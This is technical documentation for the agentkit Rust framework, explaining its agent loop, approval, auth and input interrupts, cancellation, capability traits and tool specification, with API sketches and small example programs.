The loop builds a TurnRequest from the working transcript and tool registry:

#![allow(unused)]
fn main() {
TurnRequest {
    session_id: self.session_id.clone(),
    turn_id: TurnId::new(format!("turn-{}", self.next_turn_index)),
    transcript: self.transcript.clone(),
    available_tools: self.tool_executor.specs(),
    metadata: MetadataMap::new(),
    cache: self.next_turn_cache.take().or_else(|| self.default_cache.clone()),
}
}

4. Start model turn

session.begin_turn(request, cancellation) sends the transcript to the provider and returns a streaming turn handle.

5. Stream model output

The driver polls turn.next_event() in a loop:

Loop:
  next_event() ──▶ Some(Delta(BeginPart))       ──▶ emit ContentDelta to observers
  next_event() ──▶ Some(Delta(AppendText))      ──▶ emit ContentDelta to observers
  next_event() ──▶ Some(Delta(CommitPart))      ──▶ emit ContentDelta to observers
  next_event() ──▶ Some(ToolCall(ToolCallPart)) ──▶ collect for execution
  next_event() ──▶ Some(Usage(Usage))           ──▶ emit UsageUpdated to observers
  next_event() ──▶ Some(Finished(result))       ──▶ break

6. Execute tools

If the model requested tool calls (indicated by FinishReason::ToolCall):

  1. The driver constructs a ToolRequest for each ToolCallPart
  2. Each request goes through the task manager for scheduling
  3. The task manager routes each tool call (foreground, background, or foreground-then-detach)
  4. The executor runs permission preflight on each tool
  5. If any tool requires approval → the driver surfaces LoopStep::Interrupt(ApprovalRequest)
  6. If any tool requires auth → the driver surfaces LoopStep::Interrupt(AuthRequest)
  7. Otherwise → tools execute and results are appended to the transcript as ToolResultParts

7. Tool roundtrip

If tools were executed, the driver starts another model turn automatically (back to step 3). The model sees the tool results and may request more tools or produce a final response.

8. Return result

When the model finishes without pending tool calls, the driver returns:

#![allow(unused)]
fn main() {
LoopStep::Finished(TurnResult {
    turn_id,
    finish_reason: FinishReason::Completed,
    items: /* assistant items from this turn */,
    usage: /* accumulated usage */,
    metadata: MetadataMap::new(),
})
}

Multiple tool roundtrips per user turn

A single user message can trigger many tool roundtrips:

User: "Add error handling to src/parser.rs"

  Turn 1: model → ToolCall(fs.read_file)
          execute → result appended
  Turn 2: model → ToolCall(fs.replace_in_file)
          execute → result appended
  Turn 3: model → ToolCall(shell.exec("cargo check"))
          execute → result appended
  Turn 4: model → Text("I've added error handling...")
          no tool calls → Finished

Host sees: one call to next(), one TurnResult with all items.

From the host’s perspective, this is one call to next() that returns one TurnResult containing all items produced across all internal turns. This is a critical feature for coding agents — the model must be able to chain tool calls without returning control to the host after each one.
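The internal roundtrip loop can be sketched with stand-in types. `FakeModel`, `TurnOutput`, and `run_user_turn` below are illustrative, not part of the agentkit API; the point is that tool calls loop internally while the host sees one result:

```rust
#[derive(Debug, PartialEq)]
enum TurnOutput {
    ToolCall(String),
    Text(String),
}

// A scripted model standing in for a real provider: two tool calls,
// then a final text answer.
struct FakeModel {
    turn: usize,
}

impl FakeModel {
    fn next_turn(&mut self, _transcript: &[String]) -> TurnOutput {
        self.turn += 1;
        match self.turn {
            1 => TurnOutput::ToolCall("fs.read_file".into()),
            2 => TurnOutput::ToolCall("fs.replace_in_file".into()),
            _ => TurnOutput::Text("I've added error handling.".into()),
        }
    }
}

// The driver keeps looping while the model requests tools; control does
// NOT return to the host between roundtrips.
fn run_user_turn(model: &mut FakeModel, transcript: &mut Vec<String>) -> String {
    loop {
        match model.next_turn(transcript) {
            TurnOutput::ToolCall(name) => {
                // Execute the tool and append its result, then go again.
                transcript.push(format!("tool_result({name})"));
            }
            TurnOutput::Text(answer) => return answer,
        }
    }
}

fn main() {
    let mut model = FakeModel { turn: 0 };
    let mut transcript = vec!["user: add error handling".to_string()];
    let answer = run_user_turn(&mut model, &mut transcript);
    assert_eq!(transcript.len(), 3); // user message + two tool results
    println!("{answer}");
}
```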

Event delivery during a turn

While the driver processes a turn, non-blocking events are delivered to observers synchronously:

#![allow(unused)]
fn main() {
pub trait LoopObserver: Send {
    fn handle_event(&mut self, event: AgentEvent);
}
}

The full event taxonomy:

Event                       When it fires
RunStarted                  Agent::start() completes
TurnStarted                 Before each model turn begins
InputAccepted               submit_input() is called
ContentDelta(Delta)         Model streams a delta
ToolCallRequested           Model requests a tool call
ApprovalRequired            A tool requires approval
AuthRequired                A tool requires auth
ApprovalResolved            An approval interrupt is resolved
AuthResolved                An auth interrupt is resolved
CompactionStarted           Compaction trigger fires
CompactionFinished          Compaction pipeline completes
UsageUpdated(Usage)         Token usage reported
Warning(String)             Non-fatal issue (recovered tool error, etc.)
RunFailed(String)           Unrecoverable error
TurnFinished(TurnResult)    A turn completes

Observers are called inline, synchronously, in registration order. The loop task blocks briefly for each observer call. This is acceptable because observers should be fast — write to stderr, increment a counter, append to a buffer. Expensive processing should happen asynchronously behind a channel adapter.
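The channel-adapter pattern mentioned above can be sketched as follows, with simplified stand-ins for `LoopObserver` and `AgentEvent`. The observer only pushes onto a channel; expensive processing happens on the receiving end, off the loop task:

```rust
use std::sync::mpsc;

// Simplified stand-ins for the agentkit trait and event type.
#[derive(Debug, Clone, PartialEq)]
enum AgentEvent {
    TurnStarted,
    Warning(String),
}

trait LoopObserver: Send {
    fn handle_event(&mut self, event: AgentEvent);
}

// The observer itself is cheap: one non-blocking channel send per event.
struct ChannelObserver {
    tx: mpsc::Sender<AgentEvent>,
}

impl LoopObserver for ChannelObserver {
    fn handle_event(&mut self, event: AgentEvent) {
        // Ignore send errors: a dropped receiver just means nobody is listening.
        let _ = self.tx.send(event);
    }
}

fn main() {
    let (tx, rx) = mpsc::channel();
    let mut observer = ChannelObserver { tx };
    observer.handle_event(AgentEvent::TurnStarted);
    observer.handle_event(AgentEvent::Warning("slow tool".into()));
    drop(observer); // close the channel so the drain below terminates

    // A worker thread would normally drain this; here we drain inline.
    let drained: Vec<_> = rx.iter().collect();
    assert_eq!(drained.len(), 2);
    println!("drained {} events", drained.len());
}
```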

Building the agent

The Agent is built with a builder:

#![allow(unused)]
fn main() {
let agent = Agent::builder()
    .model(adapter)                          // required
    .tools(registry)                         // default: empty
    .permissions(checker)                    // default: allow all
    .resources(resources)                    // default: ()
    .task_manager(manager)                   // default: SimpleTaskManager
    .cancellation(cancellation_handle)       // default: none
    .compaction(config)                      // default: none
    .observer(reporter)                      // default: none
    .build()?;

let mut driver = agent.start(session_config).await?;
}

The builder validates that a model adapter is set. Everything else has sensible defaults:

Field           Default               Effect
tools           empty ToolRegistry    Model can’t call any tools
permissions     AllowAllPermissions   Every tool call is auto-approved
resources       ()                    No shared resources
task_manager    SimpleTaskManager     Sequential, inline tool execution
cancellation    None                  No cancellation support
compaction      None                  Transcript grows without bounds
observers       []                    No event reporting

Agent::start() consumes the agent and returns a LoopDriver. The agent’s immutable configuration (adapter, tools, permissions) is moved into the driver. To create multiple drivers from the same configuration, clone the Agent before calling start().

Snapshots

The driver exposes a read-only snapshot for inspection or persistence:

#![allow(unused)]
fn main() {
let snapshot: LoopSnapshot = driver.snapshot();
// snapshot.session_id, snapshot.transcript, snapshot.pending_input
}

This is useful for debugging (inspect the transcript mid-session), persistence (serialize and resume later), and testing (assert on transcript state).

Cancellation

If the host connects a CancellationHandle (e.g. wired to a Ctrl-C handler), the driver creates TurnCancellation checkpoints and passes them to model turns and tool executions:

Host wires Ctrl-C:

  ctrlc::set_handler(move || controller.interrupt());

Driver flow:

  1. checkpoint = cancellation.checkpoint()
  2. session.begin_turn(request, Some(checkpoint.clone()))
  3. turn.next_event(Some(checkpoint.clone()))
     └── if cancelled → LoopError::Cancelled
  4. tool.invoke(request, ctx)  // ctx.cancellation = Some(checkpoint)
     └── if cancelled → ToolError::Cancelled

When cancellation fires, the current turn ends with FinishReason::Cancelled. The driver adds metadata (agentkit.interrupted: true, agentkit.interrupt_reason: "user_cancelled") to the turn result so the host can distinguish cancellation from normal completion.
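One way to implement checkpoint-style cancellation is a shared atomic flag. The sketch below assumes exactly that; the real `CancellationHandle` and `TurnCancellation` types may differ in detail:

```rust
use std::sync::atomic::{AtomicBool, Ordering};
use std::sync::Arc;

// A checkpoint is a cheap clone of the shared flag; model turns and tool
// executions poll it.
#[derive(Clone)]
struct Checkpoint {
    cancelled: Arc<AtomicBool>,
}

impl Checkpoint {
    fn is_cancelled(&self) -> bool {
        self.cancelled.load(Ordering::SeqCst)
    }
}

struct CancellationHandle {
    cancelled: Arc<AtomicBool>,
}

impl CancellationHandle {
    fn new() -> Self {
        Self { cancelled: Arc::new(AtomicBool::new(false)) }
    }
    // Called from e.g. a Ctrl-C handler.
    fn interrupt(&self) {
        self.cancelled.store(true, Ordering::SeqCst);
    }
    // Each turn gets its own handle onto the shared flag.
    fn checkpoint(&self) -> Checkpoint {
        Checkpoint { cancelled: Arc::clone(&self.cancelled) }
    }
}

fn main() {
    let handle = CancellationHandle::new();
    let checkpoint = handle.checkpoint();
    assert!(!checkpoint.is_cancelled());

    handle.interrupt(); // what the Ctrl-C handler would do
    // Every outstanding checkpoint observes the cancellation.
    assert!(checkpoint.is_cancelled());
    println!("cancelled: {}", checkpoint.is_cancelled());
}
```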

Example: openrouter-coding-agent demonstrates a driver executing filesystem tool calls across multiple roundtrips in a single turn.

Crate: agentkit-loop — the Agent, AgentBuilder, LoopDriver, LoopStep, TurnResult, and LoopSnapshot types.

Interrupts and control flow

The loop runs autonomously until it hits something that requires a human decision. These blocking points are interrupts. This chapter covers how interrupts work, why they exist, and how hosts resolve them.

The interrupt model

#![allow(unused)]
fn main() {
pub enum LoopStep {
    Interrupt(LoopInterrupt),
    Finished(TurnResult),
}

pub enum LoopInterrupt {
    ApprovalRequest(PendingApproval),
    AuthRequest(PendingAuth),
    AwaitingInput(InputRequest),
}
}

Each interrupt type represents a different reason the loop cannot proceed without host intervention. The variants carry handle types (PendingApproval, PendingAuth, InputRequest) with ergonomic resolution methods, so hosts can resolve the interrupt directly on the handle rather than reaching back into the driver.

Loop autonomy boundary:

  ┌──────────────────────────────────────────────────────┐
  │                Autonomous zone                       │
  │                                                      │
  │   model turn → stream deltas → collect tool calls    │
  │   permission check → tool execution → append result  │
  │   compaction → next model turn → ...                 │
  │                                                      │
  │   The loop runs here without host involvement.       │
  └──────────────────────────┬───────────────────────────┘
                             │
                    yield point (interrupt)
                             │
  ┌──────────────────────────▼───────────────────────────┐
  │                Host decision zone                    │
  │                                                      │
  │   "Approve this shell command?"                      │
  │   "Enter your GitHub OAuth token"                    │
  │   "Type your next message"                           │
  │                                                      │
  │   The host handles this, then calls next() again.    │
  └──────────────────────────────────────────────────────┘

Approval interrupts

When a tool’s permission policy returns RequireApproval, the loop pauses and surfaces the request:

#![allow(unused)]
fn main() {
pub struct ApprovalRequest {
    pub task_id: Option<TaskId>,
    pub call_id: Option<ToolCallId>,
    pub id: ApprovalId,
    pub request_kind: String,      // e.g. "filesystem.write", "shell.command"
    pub reason: ApprovalReason,
    pub summary: String,
    pub metadata: MetadataMap,
}
}

The reason field tells the host why approval is needed:

#![allow(unused)]
fn main() {
pub enum ApprovalReason {
    PolicyRequiresConfirmation,   // Policy always requires approval for this kind
    EscalatedRisk,                // Operation flagged as higher risk than usual
    UnknownTarget,                // Target not recognised by any policy
    SensitivePath,                // Filesystem path outside the allowed set
    SensitiveCommand,             // Shell command not in the allow-list
    SensitiveServer,              // MCP server not in the trusted set
    SensitiveAuthScope,           // MCP auth scope not pre-approved
}
}

The host resolves using the PendingApproval handle:

#![allow(unused)]
fn main() {
match driver.next().await? {
    LoopStep::Interrupt(LoopInterrupt::ApprovalRequest(pending)) => {
        println!("Tool needs approval: {}", pending.request.summary);

        // Option 1: approve
        pending.approve(&mut driver)?;

        // Option 2: deny
        pending.deny(&mut driver)?;

        // Option 3: deny with reason (fed back to model)
        pending.deny_with_reason(&mut driver, "User declined")?;
    }
    ...
}
}

After resolution, the host calls next() again. If approved, the tool executes and the turn continues. If denied, the denial is reported back to the model as a tool error — the model sees the denial reason and can adjust its approach.

The approval flow in detail

1. Model emits ToolCall(fs.replace_in_file, { path: "/etc/hosts", ... })
                          │
2. Executor runs permission preflight
   └── PathPolicy: /etc/hosts is outside workspace → RequireApproval(SensitivePath)
                          │
3. Driver emits AgentEvent::ApprovalRequired to observers (for UI/logging)
                          │
4. Driver returns LoopStep::Interrupt(ApprovalRequest(PendingApproval { ... }))
                          │
                   ─── host decision ───
                          │
5a. host calls pending.approve(driver)
    └── tool executes → result appended → loop resumes
                    OR
5b. host calls pending.deny(driver)
    └── denial sent to model as ToolResultPart { is_error: true, output: "Permission denied: ..." }
    └── model sees the error and may try a different approach

Multiple pending approvals

When the model requests several tool calls in a single turn, some may require approval while others don’t. The driver surfaces one approval at a time, in the order the model emitted them:

Model response: [ToolCall("fs.write", ...), ToolCall("shell.exec", ...), ToolCall("fs.read", ...)]

Permission check:
  fs.write     → RequireApproval (outside workspace)
  shell.exec   → RequireApproval (unknown command)
  fs.read      → Allow

next() → Interrupt(ApprovalRequest for fs.write)
  host approves
next() → Interrupt(ApprovalRequest for shell.exec)
  host denies
next() → tools execute (fs.write runs, shell.exec denied, fs.read runs)
       → results appended, loop continues

The driver tracks pending approvals in a BTreeMap<ToolCallId, PendingApprovalToolCall> with a VecDeque for ordering. Each approval is surfaced individually, but they belong to the same tool round — the driver only starts tool execution once all pending approvals are resolved.
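The map-plus-queue bookkeeping can be sketched like this. The types are simplified; the real driver stores `PendingApprovalToolCall` values keyed by `ToolCallId`:

```rust
use std::collections::{BTreeMap, VecDeque};

// Pending approvals: a map for lookup by call ID, plus a queue that
// preserves the model's emission order.
struct PendingApprovals {
    by_id: BTreeMap<String, String>, // call_id → tool name
    order: VecDeque<String>,         // call_ids in emission order
}

impl PendingApprovals {
    fn new() -> Self {
        Self { by_id: BTreeMap::new(), order: VecDeque::new() }
    }
    fn add(&mut self, call_id: &str, tool: &str) {
        self.by_id.insert(call_id.into(), tool.into());
        self.order.push_back(call_id.into());
    }
    // Surface the next approval in emission order, not map order.
    fn next(&mut self) -> Option<(String, String)> {
        let id = self.order.pop_front()?;
        let tool = self.by_id.remove(&id)?;
        Some((id, tool))
    }
    // Tool execution only starts once everything is resolved.
    fn all_resolved(&self) -> bool {
        self.by_id.is_empty()
    }
}

fn main() {
    let mut pending = PendingApprovals::new();
    pending.add("call-1", "fs.write");
    pending.add("call-2", "shell.exec");

    assert!(!pending.all_resolved());
    assert_eq!(pending.next().unwrap().1, "fs.write");
    assert_eq!(pending.next().unwrap().1, "shell.exec");
    assert!(pending.all_resolved());
    println!("all approvals resolved");
}
```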

Why interrupts, not callbacks

An alternative design would pass a callback or channel into the tool executor. agentkit uses interrupts instead because:

  1. Explicit control flow — the host’s main loop always knows what state the driver is in. There’s no hidden state machine running in the background.
  2. No hidden concurrency — approval doesn’t happen on a background thread while the loop keeps running. The loop is genuinely paused.
  3. Testability — interrupt-based flows are easy to test: submit input, call next(), assert you get the expected interrupt, resolve it, call next() again. No mocking of async channels.
  4. Serializable state — an interrupted driver can be snapshotted and resumed later, because the interrupt carries all state needed for resolution.

Callback model (rejected):

  loop calls tool → tool calls approval_callback → callback calls host code
  └── Who owns the stack? Can the host do async work? What if the host panics?
      What if multiple tools need approval concurrently?

Interrupt model (adopted):

  loop calls tool → tool needs approval → loop returns Interrupt to host
  └── Host owns the stack. Host does whatever it needs. Calls next() when ready.

Auth interrupts

MCP servers and external tools may require authentication. Auth interrupts follow the same pattern:

#![allow(unused)]
fn main() {
pub struct AuthRequest {
    pub task_id: Option<TaskId>,
    pub id: String,
    pub provider: String,           // e.g. "github", "google"
    pub operation: AuthOperation,   // what triggered the auth
    pub challenge: MetadataMap,     // OAuth URLs, scopes, etc.
}
}

The AuthOperation enum describes what triggered the auth requirement:

#![allow(unused)]
fn main() {
pub enum AuthOperation {
    ToolCall { tool_name, input, ... },
    McpConnect { server_id, ... },
    McpToolCall { server_id, tool_name, input, ... },
    McpResourceRead { server_id, resource_id, ... },
    McpPromptGet { server_id, prompt_id, args, ... },
    Custom { kind, payload, ... },
}
}

The host resolves using the PendingAuth handle:

#![allow(unused)]
fn main() {
match driver.next().await? {
    LoopStep::Interrupt(LoopInterrupt::AuthRequest(pending)) => {
        println!("Auth required from: {}", pending.request.provider);

        // Option 1: provide credentials
        let mut creds = MetadataMap::new();
        creds.insert("token".into(), json!("ghp_..."));
        pending.provide(&mut driver, creds)?;

        // Option 2: cancel
        pending.cancel(&mut driver)?;
    }
    ...
}
}

Input interrupts

When the model finishes a turn and the loop has no pending input, it returns AwaitingInput:

#![allow(unused)]
fn main() {
pub struct InputRequest {
    pub session_id: SessionId,
    pub reason: String,
}
}

The host reads the next user message and submits it:

#![allow(unused)]
fn main() {
LoopStep::Interrupt(LoopInterrupt::AwaitingInput(pending)) => {
    let user_message = read_line()?;
    pending.submit(&mut driver, vec![user_item(user_message)])?;
}
}

This is the most common interrupt in an interactive session. The pattern is: model finishes → host gets AwaitingInput → host reads user input → host calls submit → host calls next() → loop runs another turn.

Interrupt ordering and state safety

The driver enforces strict state transitions:

Valid transitions:

  submit_input() ──▶ next() ──▶ Finished
                               ──▶ Interrupt(Approval) ──▶ resolve_approval() ──▶ next()
                               ──▶ Interrupt(Auth)     ──▶ resolve_auth()     ──▶ next()
                               ──▶ Interrupt(Awaiting) ──▶ submit_input()     ──▶ next()

Invalid (state errors):

  next() while an approval is pending                    → LoopError::InvalidState
  resolve_approval() with no pending approval            → LoopError::InvalidState
  resolve_approval() for a ToolCallId that doesn't exist → LoopError::InvalidState

These constraints prevent subtle bugs where the host accidentally skips or duplicates an interrupt resolution. The cost is that the host must handle interrupts immediately, but this matches the reality that an unanswered approval request means the agent genuinely cannot proceed.
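The transition rules can be modeled as a small state machine. This sketch uses a simplified three-state driver and a pared-down `LoopError`, not the real `LoopDriver` internals:

```rust
#[derive(Debug, PartialEq)]
enum DriverState {
    Idle,
    Running,
    AwaitingApproval,
}

#[derive(Debug, PartialEq)]
enum LoopError {
    InvalidState(&'static str),
}

struct Driver {
    state: DriverState,
}

impl Driver {
    fn next(&mut self) -> Result<(), LoopError> {
        match self.state {
            // next() while an approval is pending is a state error.
            DriverState::AwaitingApproval => {
                Err(LoopError::InvalidState("approval pending"))
            }
            _ => {
                self.state = DriverState::Running;
                Ok(())
            }
        }
    }

    fn resolve_approval(&mut self) -> Result<(), LoopError> {
        // resolve_approval() with nothing pending is also a state error.
        if self.state != DriverState::AwaitingApproval {
            return Err(LoopError::InvalidState("no pending approval"));
        }
        self.state = DriverState::Idle;
        Ok(())
    }
}

fn main() {
    let mut driver = Driver { state: DriverState::AwaitingApproval };
    assert!(driver.next().is_err());            // must resolve the approval first
    assert!(driver.resolve_approval().is_ok());
    assert!(driver.next().is_ok());             // now the loop may continue
    assert!(driver.resolve_approval().is_err()); // nothing pending anymore
    println!("state transitions enforced");
}
```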

The event/interrupt duality

Some actions are reported both as non-blocking observations and as blocking interrupts:

Observer receives                    Host receives
AgentEvent::ApprovalRequired(req)    LoopStep::Interrupt(ApprovalRequest(pending))
AgentEvent::AuthRequired(req)        LoopStep::Interrupt(AuthRequest(pending))
AgentEvent::TurnFinished(result)     LoopStep::Finished(result)

This duplication is intentional. The event is for observability — a reporter logs it, a UI updates a status indicator. The interrupt is for control flow — the host must answer it before the loop can continue. These are different concerns served by different mechanisms.

A reporter that displays “Waiting for approval…” needs the event. The host code that prompts the user needs the interrupt. Neither should have to reach into the other’s channel.

Practical patterns

Auto-approve by policy

If your permission policy already knows which operations are safe, it returns Allow instead of RequireApproval. The loop never interrupts for those operations. Configure your policies conservatively and expand allowlists as you build confidence.

Session-scoped approvals

A host can maintain a session-local allowlist. When the user approves a command like cargo build, add it to the allowlist. On subsequent approval interrupts, check the allowlist before prompting:

#![allow(unused)]
fn main() {
LoopStep::Interrupt(LoopInterrupt::ApprovalRequest(pending)) => {
    if session_allowlist.contains(&pending.request.request_kind) {
        pending.approve(&mut driver)?;
    } else {
        let decision = prompt_user(&pending.request)?;
        if decision == "always" {
            session_allowlist.insert(pending.request.request_kind.clone());
        }
        // resolve based on decision
    }
}
}

Headless operation

For non-interactive agents (CI, background jobs), either configure permissive policies or auto-approve everything:

#![allow(unused)]
fn main() {
LoopStep::Interrupt(LoopInterrupt::ApprovalRequest(pending)) => {
    pending.approve(&mut driver)?;
}
}

The approval system still runs — it’s just that the policy answers “yes” to everything. The events are still emitted, so audit logging captures every approved operation.

Example: openrouter-coding-agent handles approval interrupts for filesystem writes in its main loop.

Crate: agentkit-loopLoopStep, LoopInterrupt, PendingApproval, PendingAuth, InputRequest. Approval types come from agentkit-tools-core.

The capability layer

Before we discuss tools, we need to understand the abstraction they build on. agentkit-capabilities defines a lower-level interoperability layer for anything a model can interact with: operations it can invoke, data it can read, and prompt templates it can use.

Why a layer beneath tools

The current design has three external capability shapes:

  • Invocables — named request/response operations (tools, MCP tools, custom operations)
  • Resources — named data blobs that can be listed and read (files, database rows, API responses)
  • Prompts — parameterized templates that produce conversation items

Native tools and MCP tools are both invocable operations. But MCP also exposes resources and prompts, which are not tools. Forcing everything through a Tool trait would distort the model — reading a resource is not a tool call, and rendering a prompt template is not tool execution.

Without a capability layer:

  Tool trait ◀── native tools
             ◀── MCP tools (fit naturally)
             ◀── MCP resources (forced into tool shape — read_resource "tool")
             ◀── MCP prompts (forced into tool shape — render_prompt "tool")

  Everything is a tool. But reading a resource has no side effects,
  no permission model, and no schema. Wrapping it as a "tool" adds
  complexity without adding value.


With a capability layer:

  Invocable  ◀── native tools (via Tool → Invocable bridge)
             ◀── MCP tools (via McpToolAdapter)

  ResourceProvider ◀── MCP resources
                   ◀── custom data sources

  PromptProvider   ◀── MCP prompts
                   ◀── custom template engines

  Each shape gets the right abstraction. No forced fitting.

The capability layer gives MCP, tools, and future integrations one shared vocabulary without pretending everything is the same thing.

Invocable

The core trait for anything the model can call:

#![allow(unused)]
fn main() {
#[async_trait]
pub trait Invocable: Send + Sync {
    fn spec(&self) -> &InvocableSpec;
    async fn invoke(
        &self,
        request: InvocableRequest,
        ctx: &mut CapabilityContext<'_>,
    ) -> Result<InvocableResult, CapabilityError>;
}
}

An InvocableSpec carries the name, description, and JSON Schema for the input — enough information to present the capability to a model:

#![allow(unused)]
fn main() {
pub struct InvocableSpec {
    pub name: CapabilityName,
    pub description: String,
    pub input_schema: Value,       // JSON Schema object
    pub metadata: MetadataMap,
}
}

The request carries the model’s input arguments plus session context:

#![allow(unused)]
fn main() {
pub struct InvocableRequest {
    pub input: Value,
    pub session_id: Option<SessionId>,
    pub turn_id: Option<TurnId>,
    pub metadata: MetadataMap,
}
}

And the result supports multiple return shapes:

#![allow(unused)]
fn main() {
pub struct InvocableResult {
    pub output: InvocableOutput,
    pub metadata: MetadataMap,
}

pub enum InvocableOutput {
    Text(String),             // Plain text response
    Structured(Value),        // JSON value
    Items(Vec<Item>),         // Conversation items (for prompts, multi-part results)
    Data(DataRef),            // Binary or referenced data
}
}

Invocable vs Tool

Invocable is deliberately thinner than Tool:

Invocable                             Tool
spec: InvocableSpec                   spec: ToolSpec (adds annotations)
invoke(request, CapabilityContext)    invoke(request, ToolContext)
—                                     proposed_requests() (preflight)
—                                     ToolAnnotations (read_only, destructive, …)
—                                     ToolContext (permissions, resources, cancellation)

An Invocable knows its name, description, schema, and how to execute. A Tool adds permission semantics, behavioural hints, and a richer execution context. Tools are invocables with opinions about safety.

Resources and prompts

#![allow(unused)]
fn main() {
#[async_trait]
pub trait ResourceProvider: Send + Sync {
    async fn list_resources(&self) -> Result<Vec<ResourceDescriptor>, CapabilityError>;
    async fn read_resource(&self, id: &ResourceId, ctx: &mut CapabilityContext<'_>)
        -> Result<ResourceContents, CapabilityError>;
}
}

Resources are named data blobs. They have an ID, a name, an optional description and MIME type. Reading them returns a DataRef — the content might be inline text, inline bytes, or a URI:

#![allow(unused)]
fn main() {
pub struct ResourceDescriptor {
    pub id: ResourceId,
    pub name: String,
    pub description: Option<String>,
    pub mime_type: Option<String>,
    pub metadata: MetadataMap,
}

pub struct ResourceContents {
    pub data: DataRef,
    pub metadata: MetadataMap,
}
}

Prompts are parameterized templates that produce conversation items:

#![allow(unused)]
fn main() {
#[async_trait]
pub trait PromptProvider: Send + Sync {
    async fn list_prompts(&self) -> Result<Vec<PromptDescriptor>, CapabilityError>;
    async fn get_prompt(&self, id: &PromptId, args: Value, ctx: &mut CapabilityContext<'_>)
        -> Result<PromptContents, CapabilityError>;
}
}

A prompt descriptor carries a JSON Schema for its arguments:

#![allow(unused)]
fn main() {
pub struct PromptDescriptor {
    pub id: PromptId,
    pub name: String,
    pub description: Option<String>,
    pub input_schema: Value,
    pub metadata: MetadataMap,
}

pub struct PromptContents {
    pub items: Vec<Item>, // Rendered conversation items
    pub metadata: MetadataMap,
}
}

These are separate traits, not specializations of Invocable. The type system enforces the distinction — you can’t accidentally pass a ResourceProvider where an Invocable is expected.

Capability type     Model interaction        Side effects    Permission model
Invocable           Model calls it           May have        Full tool permissions
ResourceProvider    Host reads, injects      Read-only       Simpler (list + read)
PromptProvider      Host renders, injects    None            None (templates only)

CapabilityProvider

Many integrations expose multiple capability kinds. The CapabilityProvider trait bundles them:

#![allow(unused)]
fn main() {
pub trait CapabilityProvider: Send + Sync {
    fn invocables(&self) -> Vec<Arc<dyn Invocable>>;
    fn resources(&self) -> Vec<Arc<dyn ResourceProvider>>;
    fn prompts(&self) -> Vec<Arc<dyn PromptProvider>>;
}
}

An MCP server implements CapabilityProvider to expose its tools, resources, and prompts through one registration point:

MCP server "github"
  │
  ├── invocables:  [search_issues, create_pr, merge_pr]
  ├── resources:   [repo_readme, issue_list, pr_diff]
  └── prompts:     [code_review_prompt, bug_report_template]
       │
       ▼
  CapabilityProvider::invocables()  → Vec<Arc<dyn Invocable>>
  CapabilityProvider::resources()   → Vec<Arc<dyn ResourceProvider>>
  CapabilityProvider::prompts()     → Vec<Arc<dyn PromptProvider>>

The loop collects all capability providers and merges their invocables into the unified tool list presented to the model. Resources and prompts flow through separate paths — they’re typically consumed by the context loader or the host, not directly by the model.
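Merging invocables from several providers into one model-facing list can be sketched as follows, with pared-down stand-ins for the capability traits:

```rust
use std::sync::Arc;

// Pared-down stand-ins for the agentkit capability traits.
trait Invocable: Send + Sync {
    fn name(&self) -> &str;
}

trait CapabilityProvider {
    fn invocables(&self) -> Vec<Arc<dyn Invocable>>;
}

struct NamedInvocable(&'static str);
impl Invocable for NamedInvocable {
    fn name(&self) -> &str { self.0 }
}

// One provider for native tools, one for an (illustrative) MCP server.
struct NativeTools;
impl CapabilityProvider for NativeTools {
    fn invocables(&self) -> Vec<Arc<dyn Invocable>> {
        vec![Arc::new(NamedInvocable("fs.read_file"))]
    }
}

struct McpServer;
impl CapabilityProvider for McpServer {
    fn invocables(&self) -> Vec<Arc<dyn Invocable>> {
        vec![Arc::new(NamedInvocable("mcp.github.search_issues"))]
    }
}

fn main() {
    let providers: Vec<Box<dyn CapabilityProvider>> =
        vec![Box::new(NativeTools), Box::new(McpServer)];
    // The loop flattens every provider's invocables into one tool list.
    let tool_list: Vec<String> = providers
        .iter()
        .flat_map(|p| p.invocables())
        .map(|i| i.name().to_string())
        .collect();
    assert_eq!(tool_list, vec!["fs.read_file", "mcp.github.search_issues"]);
    println!("{tool_list:?}");
}
```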

CapabilityContext

#![allow(unused)]
fn main() {
pub struct CapabilityContext<'a> {
    pub session_id: Option<&'a SessionId>,
    pub turn_id: Option<&'a TurnId>,
    pub metadata: &'a MetadataMap,
}
}

This is a minimal context passed to all capability invocations. It carries enough to correlate work with a session and turn, but not enough to reach into the loop or modify the transcript.

The tool layer wraps this in a richer ToolContext that adds permission checking, shared resources, and cancellation:

CapabilityContext (lean)    ToolContext (rich)
session_id                  capability: CapabilityContext
turn_id                     permissions: &dyn PermissionChecker
metadata                    resources: &dyn ToolResources
                            cancellation: Option<TurnCancellation>

The capability layer doesn’t know about permissions or cancellation. These are tool-layer concerns, added by the ToolContext wrapper.

Error handling

All capability traits use a single error type:

#![allow(unused)]
fn main() {
pub enum CapabilityError {
    Unavailable(String),     // Capability not found or offline
    InvalidInput(String),    // Arguments failed validation
    ExecutionFailed(String), // Runtime failure
}
}

This is intentionally coarse-grained. The capability layer doesn’t try to enumerate every failure mode — it provides three buckets that cover the meaningful distinctions: “doesn’t exist”, “bad input”, and “broken at runtime”. Downstream layers (tools, MCP) add their own error types when finer granularity is needed.

Positioning

This layer is public and extensible, but it is not the primary extension point for most users. The intended guidance:

“I want to…”                                 Implement…
Add a custom tool that the model can call    Tool trait (ch09)
Expose data for context loading              ResourceProvider
Expose parameterized prompt templates        PromptProvider
Integrate an MCP server                      CapabilityProvider (ch17)
Build something that doesn’t fit above       Invocable directly

Most users implement Tool. The capability traits matter when you’re integrating MCP servers, building custom data sources, or working on the framework itself.

Crate: agentkit-capabilities — depends only on agentkit-core. No runtime dependencies, no async runtime requirements beyond the traits themselves.

Designing a tool system

This chapter covers agentkit-tools-core: the tool execution contract that connects the loop to actual functionality. We’ll walk through the design decisions behind tool specs, the registry, the executor, and how tools bridge to the capability layer underneath.

The tool trait

#![allow(unused)]
fn main() {
#[async_trait]
pub trait Tool: Send + Sync {
    fn spec(&self) -> &ToolSpec;
    async fn invoke(
        &self,
        request: ToolRequest,
        ctx: &mut ToolContext<'_>,
    ) -> Result<ToolResult, ToolError>;
}
}

A tool has two concerns: description and execution. The spec() method returns the model-facing description. The invoke() method does the work.

ToolSpec

#![allow(unused)]
fn main() {
pub struct ToolSpec {
    pub name: ToolName,
    pub description: String,
    pub input_schema: Value,
    pub annotations: ToolAnnotations,
    pub metadata: MetadataMap,
}
}

ToolAnnotations carry behavioral hints:

#![allow(unused)]
fn main() {
pub struct ToolAnnotations {
    pub read_only_hint: bool,
    pub destructive_hint: bool,
    pub idempotent_hint: bool,
    pub needs_approval_hint: bool,
    pub supports_streaming_hint: bool,
}
}

These are hints, not guarantees. The actual enforcement comes from the permission system. But they’re useful for model guidance, UI presentation, and default policy decisions.

